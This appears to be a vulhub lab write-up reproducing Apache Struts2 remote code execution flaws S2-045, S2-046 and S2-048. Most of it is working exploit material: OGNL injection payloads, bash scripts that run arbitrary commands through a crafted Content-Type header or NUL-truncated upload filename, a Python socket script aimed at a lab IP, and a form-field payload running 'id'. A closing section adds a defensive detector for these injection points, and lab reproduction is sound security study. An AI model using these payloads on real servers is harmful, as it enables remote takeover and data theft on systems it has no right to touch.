vulhub lab: Struts2 vulnerability reproduction (part 3)

0x01 S2-045 remote code execution vulnerability

Principle

When file uploads are handled by the Jakarta multipart plugin, a crafted request can lead to remote code execution: for example, obtaining administrator privileges on the system and adding users, or arbitrarily viewing, modifying or deleting files, which results in leakage of confidential data, tampering with important information and other serious harm.

Affected versions

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

PoC

Modify the following header when sending the request:

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

The following payload was found online, but I was not able to reproduce the issue successfully with it:

#!/bin/bash

url=$1

boundary="---------------------------WEBKIT198919991920098822555"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','whoami'}:{'/bin/bash','-c','$2'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

if [[ $1 ]]; then
echo "================HTTP GET Method================";
curl "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $payload" -H "Connection: close" 2>/dev/null
echo "================HTTP POST Method================"
curl -X 'POST' "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $payload" -H "Connection: close" --data-binary "test" 2>/dev/null
else :
echo "$0 [url]"
fi
Usage

./s2-045.sh url cmd

0x02 S2-046 remote code execution vulnerability

Principle

Similar to S2-045, but the injection point is the filename value of the file upload, and a \x00 byte must be used to truncate it.

Affected versions

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

Reproduction

import socket

q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b"
Content-Type: text/plain

foo
------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n')
p = b'''POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Length: %d

'''.replace(b'\n', b'\r\n') % (len(q), )

with socket.create_connection(('192.168.184.128', '8080'), timeout=5) as conn:
    conn.send(p + q)
    print(conn.recv(10240).decode())

Insert the following into the filename:

%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233+123)}\x00b

Find the character before b and apply the null-byte (\x00) truncation there.

PoC for command execution

#!/bin/bash

url=$1

boundary="---------------------------WEBKIT198919991920098822555"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','whoami'}:{'/bin/bash','-c','$2'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

if [[ $1 ]]; then
echo "================HTTP GET Method================";
printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nzzzzz\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $content_type" -H "Connection: close" --data-binary @- $@ 2>/dev/null
echo "================HTTP POST Method================"
printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nzzzzz\r\n--$boundary--\r\n\r\n" "$payload" | curl -X 'POST' "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $content_type" -H "Connection: close" --data-binary @- $@ 2>/dev/null
else :
echo "$0 [url]"
fi

Usage

./t.sh url cmd

0x03 S2-048 remote code execution vulnerability

Principle

A crafted malicious field value passed through the Struts2 struts2-struts1-plugin leads to remote code execution.

Affected versions

2.0.0 - 2.3.32

Vulnerability reproduction

Visit http://your-ip:8080/showcase/ to see the Struts2 showcase test page.

Go to Integration / Struts 1 Integration.

The place where the OGNL expression is triggered is the Gangster Name form field.

Enter ${233*233} to see the evaluation result (the other two fields can be filled in with anything).

Fill the following PoC into the Gangster Name form field and submit; the result of the command execution is echoed directly:
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
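As an added, defender-side example that is not part of the original post or of vulhub, the following Python detector checks raw HTTP requests for the three OGNL injection points this post walks through: the S2-045 Content-Type header, the S2-046 multipart filename with its NUL byte, and the S2-048 form field. The sample requests, the form field name and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# OGNL markers for the three injection points on this page: the "%{" / "${"
# opener plus members the PoCs reference. Hypothetical detector, not Struts code.
OGNL_OPENER = re.compile(r"[%$]\{")
OGNL_HINTS = re.compile(r"#context\[|#_memberAccess|DEFAULT_MEMBER_ACCESS|"
                        r"ProcessBuilder|@java\.lang\.Runtime@|getExcludedPackageNames")
FILENAME_RE = re.compile(rb'filename="([^"\r\n]*)"')


def is_ognl_suspect(value: str) -> bool:
    """True when a header, filename or form value looks like an OGNL expression."""
    return bool(OGNL_OPENER.search(value) or OGNL_HINTS.search(value))


def scan_request(raw: bytes) -> list:
    """Return (injection point, evidence) pairs found in one raw HTTP request."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    content_type = ""
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-type":
            content_type = value.strip().decode("latin-1")
    if is_ognl_suspect(content_type):             # S2-045: expression in the header
        findings.append(("S2-045 Content-Type header", content_type))
    for match in FILENAME_RE.finditer(body):      # S2-046: expression + NUL in filename
        fname = match.group(1).decode("latin-1")
        if "\x00" in fname or is_ognl_suspect(fname):
            findings.append(("S2-046 multipart filename", fname))
    if content_type.startswith("application/x-www-form-urlencoded"):
        for field, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True):
            if is_ognl_suspect(value):            # S2-048: expression in a form field
                findings.append((f"S2-048 form field {field}", value))
    return findings


# Constructed sample requests (not captured traffic); the S2-048 field name is a placeholder.
S2_045 = (b"POST / HTTP/1.1\r\nHost: localhost:8080\r\nContent-Type: %{#context['com."
          b"opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}"
          b".multipart/form-data\r\nContent-Length: 4\r\n\r\ntest")
S2_046 = (b"POST / HTTP/1.1\r\nHost: localhost:8080\r\nContent-Type: multipart/form-data; "
          b"boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"upload\"; "
          b"filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
          b".addHeader('X-Test',233*233)}\x00b\"\r\nContent-Type: text/plain\r\n\r\nfoo\r\n------X--")
S2_048 = (b"POST /showcase/ HTTP/1.1\r\nHost: localhost:8080\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n\r\nname=%24%7B233*233%7D&age=1")
BENIGN = (b"POST /upload HTTP/1.1\r\nHost: localhost:8080\r\nContent-Type: multipart/form-data; "
          b"boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"upload\"; "
          b"filename=\"report.txt\"\r\nContent-Type: text/plain\r\n\r\nfoo\r\n------X--")
```

Running `scan_request` over the four constructed requests flags exactly one injection point in each of the first three and nothing in the benign upload; the same checks can be wired into a reverse proxy or WAF rule as a stopgap until the affected Struts versions are upgraded.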